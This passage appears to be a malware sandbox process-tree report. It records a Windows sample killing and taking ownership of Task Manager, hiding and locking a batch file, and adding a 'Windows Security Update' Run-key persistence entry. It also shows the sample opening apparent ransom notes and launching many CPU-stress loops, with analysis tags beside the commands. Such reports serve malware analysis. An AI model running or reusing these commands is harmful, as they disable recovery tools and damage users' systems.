        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        32⤵
        Possible privilege escalation attempt
        
        PID:6916
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        32⤵
        
        PID:6964
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        32⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6320
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        32⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6248
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        32⤵
        Modifies file permissions
        
        PID:6128
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        32⤵
        Possible privilege escalation attempt
        
        PID:1152
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        32⤵
        
        PID:6152
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        32⤵
        
        PID:6232
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        32⤵
        
        PID:5192
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        32⤵
        Opens file in notepad (likely ransom note)
        
        PID:5268
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        32⤵
        Possible privilege escalation attempt
        
        PID:6524
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        32⤵
        Possible privilege escalation attempt
        
        PID:6616
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        32⤵
        Possible privilege escalation attempt
        
        PID:7004
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        32⤵
        
        PID:6128
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        32⤵
        Possible privilege escalation attempt
        
        PID:5820
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        32⤵
        Possible privilege escalation attempt
        
        PID:6204
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        32⤵
        
        PID:6160
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        32⤵
        Possible privilege escalation attempt
        
        PID:6296
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        32⤵
        
        PID:6524
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        32⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:6828
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        32⤵
        Opens file in notepad (likely ransom note)
        
        PID:5288
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        32⤵
        
        PID:5628
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        33⤵
        
        PID:6524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        34⤵
        
        PID:5532
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        35⤵
        
        PID:7184
        
        C:\Windows\system32\net.exe
        
        net session
        35⤵
        
        PID:7264
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        36⤵
        
        PID:7280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        35⤵
        Kills process with taskkill
        
        PID:7552
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        35⤵
        Modifies file permissions
        
        PID:7628
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        35⤵
        
        PID:7644
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        35⤵
        
        PID:7660
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        35⤵
        Modifies file permissions
        
        PID:7672
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        35⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7684
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        35⤵
        
        PID:7696
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        35⤵
        
        PID:7708
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        35⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7720
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        35⤵
        
        PID:7896
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        35⤵
        
        PID:8164
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        35⤵
        Opens file in notepad (likely ransom note)
        
        PID:7176
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        35⤵
        Modifies file permissions
        
        PID:7188
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        35⤵
        
        PID:7036
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        35⤵
        
        PID:7172
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        35⤵
        Possible privilege escalation attempt
        
        PID:7292
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        35⤵
        
        PID:7496
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        35⤵
        
        PID:7324
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        35⤵
        
        PID:7608
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        35⤵
        
        PID:7352
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        35⤵
        Modifies file permissions
        
        PID:7360
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        35⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7336
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        35⤵
        Opens file in notepad (likely ransom note)
        
        PID:7388
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        35⤵
        
        PID:7244
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        36⤵
        
        PID:7036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        37⤵
        
        PID:7544
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        38⤵
        
        PID:7416
        
        C:\Windows\system32\net.exe
        
        net session
        38⤵
        
        PID:8172
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        39⤵
        
        PID:6180
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        38⤵
        Kills process with taskkill
        
        PID:7264
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        38⤵
        Possible privilege escalation attempt
        
        PID:6852
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        38⤵
        
        PID:7560
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        38⤵
        
        PID:7708
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        38⤵
        Modifies file permissions
        
        PID:5952
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        38⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:5232
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        38⤵
        
        PID:5516
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        38⤵
        Modifies file permissions
        
        PID:2540
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        38⤵
        
        PID:1272
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        38⤵
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        38⤵
        
        PID:7712
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        38⤵
        Opens file in notepad (likely ransom note)
        
        PID:7708
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        38⤵
        
        PID:5592
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        38⤵
        
        PID:60
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        38⤵
        Possible privilege escalation attempt
        
        PID:6440
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        38⤵
        
        PID:6476
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        38⤵
        
        PID:2952
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        38⤵
        
        PID:7224
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        38⤵
        
        PID:6876
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        38⤵
        
        PID:7888
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        38⤵
        
        PID:7416
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        38⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7288
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        38⤵
        Opens file in notepad (likely ransom note)
        
        PID:7960
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        38⤵
        
        PID:6536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        39⤵
        
        PID:5520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        40⤵
        
        PID:6536
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        41⤵
        
        PID:5776
        
        C:\Windows\system32\net.exe
        
        net session
        41⤵
        
        PID:7776
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        42⤵
        
        PID:8196
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        41⤵
        Kills process with taskkill
        
        PID:8332
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\taskmgr.exe
        41⤵
        
        PID:8536
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\SysWOW64\taskmgr.exe
        41⤵
        
        PID:8764
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\taskmgr.exe /grant administrators:F
        41⤵
        
        PID:8816
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\SysWOW64\taskmgr.exe /grant administrators:F
        41⤵
        Possible privilege escalation attempt
        
        PID:8832
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h +r "C:\Windows\System32\flare.bat"
        41⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:8880
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Everyone:(F)
        41⤵
        
        PID:8892
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny SYSTEM:(F)
        41⤵
        
        PID:8940
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\flare.bat" /deny Administrators:(F)
        41⤵
        Modifies file permissions
        
        PID:9128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Update" /t REG_SZ /d "C:\Windows\System32\flare.bat" /f
        41⤵
        
        PID:9148
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe
        41⤵
        
        PID:3812
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\flare_warning.txt"
        41⤵
        Opens file in notepad (likely ransom note)
        
        PID:5696
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\CON" /deny Everyone:(F
        41⤵
        
        PID:8592
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\PRN" /deny Everyone:(F
        41⤵
        
        PID:8788
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\AUX" /deny Everyone:(F
        41⤵
        Modifies file permissions
        
        PID:8636
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\NUL" /deny Everyone:(F
        41⤵
        
        PID:8708
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM1" /deny Everyone:(F
        41⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9148
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM2" /deny Everyone:(F
        41⤵
        Modifies file permissions
        
        PID:4668
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\COM3" /deny Everyone:(F
        41⤵
        
        PID:4432
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT1" /deny Everyone:(F
        41⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6440
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\Admin\Desktop\LPT2" /deny Everyone:(F
        41⤵
        Modifies file permissions
        
        PID:5168
        
        C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\Desktop\LPT2"
        41⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:7552
        
        C:\Windows\system32\notepad.exe
        
        notepad "C:\Users\Admin\Desktop\LPT2\Fixes.txt"
        41⤵
        Opens file in notepad (likely ransom note)
        
        PID:9180
        
        C:\Windows\system32\cscript.exe
        
        cscript //nologo C:\Users\Admin\AppData\Local\Temp\launch_hidden.vbs
        41⤵
        
        PID:820
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /min C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        42⤵
        
        PID:5316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\mainversion.bat
        43⤵
        
        PID:8272
        
        C:\Windows\system32\msg.exe
        
        msg * "Fatal Error: Something unusual has occured. Maybe try restarting your PC?"
        44⤵
        
        PID:2100
        
        C:\Windows\system32\net.exe
        
        net session
        44⤵
        
        PID:8536
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        45⤵
        
        PID:7220
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        44⤵
        Kills process with taskkill
        
        PID:4668
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        41⤵
        
        PID:4136
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        41⤵
        
        PID:8904
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        38⤵
        
        PID:7276
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        38⤵
        
        PID:2500
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        38⤵
        
        PID:8460
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        38⤵
        Delays execution with timeout.exe
        
        PID:8472
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        38⤵
        
        PID:8992
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        38⤵
        
        PID:9000
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        38⤵
        
        PID:6512
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        38⤵
        
        PID:8272
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        38⤵
        
        PID:9056
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        38⤵
        
        PID:8932
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        38⤵
        
        PID:4928
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        38⤵
        
        PID:8720
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:7488
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:7496
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:7928
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:6292
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:7824
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:7288
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:5552
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:3812
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:6476
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:7760
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:5644
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:5696
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:8644
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        Delays execution with timeout.exe
        
        PID:8664
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:9028
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:9060
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:740
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:2356
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:9060
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:8248
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        35⤵
        
        PID:3576
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        35⤵
        
        PID:8576
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:6904
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:6824
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:7448
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:7456
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:7748
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:7760
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:4100
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:1608
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:7720
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:7896
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:6164
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:7128
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:2692
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        Delays execution with timeout.exe
        
        PID:2500
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:5896
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:5400
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:8124
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:5592
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:2540
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:8160
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:8504
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:8560
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:8980
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:9040
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:8836
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:8832
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:5904
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:8276
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        32⤵
        
        PID:8820
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        32⤵
        
        PID:8316
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:6744
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:6776
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:7040
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:7064
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:6920
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:6916
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:7080
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:7036
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:7116
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:6356
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:7368
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        Delays execution with timeout.exe
        
        PID:7420
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:7736
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:7776
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:1176
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:7596
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:7772
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:7776
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:7188
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:8088
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:8060
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:7960
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:6888
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:5776
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:3300
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:5952
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:5128
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:5592
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:8440
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:8448
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:9096
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:9104
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:5592
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:2268
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:1744
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:4188
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:6752
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        29⤵
        
        PID:8476
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        29⤵
        
        PID:5560
        
        C:\Windows\system32\cmd.exe
        
        cmd /c "for /l %i in (1,1,9999999) do call :cpu_stress"
        26⤵
        
        PID:1764
